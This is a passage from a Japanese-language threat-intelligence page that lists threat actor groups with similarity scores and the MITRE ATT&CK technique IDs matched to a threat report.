  • T1218.010 - Regsvr32
MITREへのリンク →

Winter Vivern

Score: 7.60
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1219.001 - IDE Tunneling
  • T1218.001 - Compiled HTML File
MITREへのリンク →

admin@338

Score: 4.00
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32
MITREへのリンク →

Medusa Group

Score: 18.18
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Stealth Falcon

Score: 6.88
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1556.009 - Conditional Access Policies
MITREへのリンク →

Velvet Ant

Score: 8.88
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1009 - Binary Padding
  • T1219.001 - IDE Tunneling
  • T1597 - Search Closed Sources
MITREへのリンク →

Strider

Score: 4.13
Matched TTPs:
  • T1574.014 - AppDomainManager
MITREへのリンク →

BackdoorDiplomacy

Score: 5.69
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1136.002 - Domain Account
MITREへのリンク →

GOLD SOUTHFIELD

Score: 4.76
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.013 - Disable or Modify Network Device Firewall
MITREへのリンク →

Cinnamon Tempest

Score: 7.76
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1045 - Software Packing
  • T1552.003 - Shell History
  • T1157 - Dylib Hijacking
MITREへのリンク →

Volatile Cedar

Score: 7.37
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1002 - Data Compressed
MITREへのリンク →

LAPSUS$

Score: 21.71
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1562.012 - Disable or Modify Linux Audit System
  • T1134.002 - Create Process with Token
  • T1019 - System Firmware
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1157 - Dylib Hijacking
  • T1564.003 - Hidden Window
MITREへのリンク →

Carbanak

Score: 3.77
Matched TTPs:
  • T1009 - Binary Padding
  • T1157 - Dylib Hijacking
MITREへのリンク →

Leafminer

Score: 7.89
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1101 - Security Support Provider
  • T1219.001 - IDE Tunneling
MITREへのリンク →

Ajax Security Team

Score: 4.58
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.008 - LSASS Driver
MITREへのリンク →

Deep Panda

Score: 7.80
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1027.014 - Polymorphic Code
MITREへのリンク →

Tonto Team

Score: 3.26
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1218.010 - Regsvr32
MITREへのリンク →

Saint Bear

Score: 7.83
Matched TTPs:
  • T1134.002 - Create Process with Token
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
MITREへのリンク →

TA551

Score: 7.61
Matched TTPs:
  • T1134.002 - Create Process with Token
  • T1218.012 - Verclsid
  • T1027.014 - Polymorphic Code
MITREへのリンク →

POLONIUM

Score: 5.78
Matched TTPs:
  • T1045 - Software Packing
  • T1608.005 - Link Target
  • T1157 - Dylib Hijacking
MITREへのリンク →

Dark Caracal

Score: 7.26
Matched TTPs:
  • T1219.001 - IDE Tunneling
  • T1048 - Exfiltration Over Alternative Protocol
  • T1547.008 - LSASS Driver
MITREへのリンク →

AppleJeus

Score: 5.81
Matched TTPs:
  • T1552.003 - Shell History
  • T1562.013 - Disable or Modify Network Device Firewall
MITREへのリンク →

Water Galura

Score: 4.86
Matched TTPs:
  • T1552.003 - Shell History
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

SilverTerrier

Score: 6.14
Matched TTPs:
  • T1552.003 - Shell History
  • T1041 - Exfiltration Over C2 Channel
MITREへのリンク →

Silence

Score: 4.86
Matched TTPs:
  • T1048 - Exfiltration Over Alternative Protocol
  • T1157 - Dylib Hijacking
MITREへのリンク →

FIN5

Score: 3.95
Matched TTPs:
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
MITREへのリンク →

BITTER

Score: 5.12
Matched TTPs:
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1009 - Binary Padding
  • T1543.003 - Windows Service
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1219.001 - IDE Tunneling
  • T1027.014 - Polymorphic Code
  • T1555.003 - Credentials from Web Browsers
  • T1041 - Exfiltration Over C2 Channel
  • T1560.001 - Archive via Utility
  • T1608.005 - Link Target
  • T1562.013 - Disable or Modify Network Device Firewall
  • T1557.003 - DHCP Spoofing
  • T1197 - BITS Jobs
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1134.002 - Create Process with Token
  • T1218.012 - Verclsid
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1055.014 - VDSO Hijacking
  • T1562.012 - Disable or Modify Linux Audit System
MITREへのリンク →

Scattered Spider

Score: 0.70
Matched TTPs:
  • T1027.002 - Software Packing
  • T1120 - Peripheral Device Discovery
  • T1218.005 - Mshta
  • T1197 - BITS Jobs
  • T1019 - System Firmware
  • T1583.001 - Domains
  • T1564.003 - Hidden Window
  • T1547.005 - Security Support Provider
  • T1552.003 - Shell History
  • T1136.002 - Domain Account
  • T1597 - Search Closed Sources
  • T1045 - Software Packing
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1219.001 - IDE Tunneling
  • T1566.002 - Spearphishing Link
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

APT41

Score: 0.66
Matched TTPs:
  • T1048 - Exfiltration Over Alternative Protocol
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1564.003 - Hidden Window
  • T1041 - Exfiltration Over C2 Channel
  • T1218.010 - Regsvr32
  • T1002 - Data Compressed
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1560.001 - Archive via Utility
  • T1177 - LSASS Driver
  • T1097 - Pass the Ticket
  • T1584.008 - Network Devices
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1574.009 - Path Interception by Unquoted Path
  • T1562.012 - Disable or Modify Linux Audit System
  • T1574.002 - DLL Side-Loading
MITREへのリンク →

Magic Hound

Score: 0.65
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1009 - Binary Padding
  • T1543.003 - Windows Service
  • T1597 - Search Closed Sources
  • T1219.001 - IDE Tunneling
  • T1547.008 - LSASS Driver
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1555.003 - Credentials from Web Browsers
  • T1547.005 - Security Support Provider
  • T1560.001 - Archive via Utility
  • T1608.005 - Link Target
  • T1683 - Generate Content
  • T1045 - Software Packing
  • T1566.002 - Spearphishing Link
  • T1134.002 - Create Process with Token
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1098.002 - Additional Email Delegate Permissions
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Sandworm Team

Score: 0.56
Matched TTPs:
  • T1557.003 - DHCP Spoofing
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1218.010 - Regsvr32
  • T1075 - Pass the Hash
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1566.002 - Spearphishing Link
  • T1157 - Dylib Hijacking
  • T1063 - Security Software Discovery
  • T1027 - Obfuscated Files or Information
  • T1049 - System Network Connections Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1134.002 - Create Process with Token
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る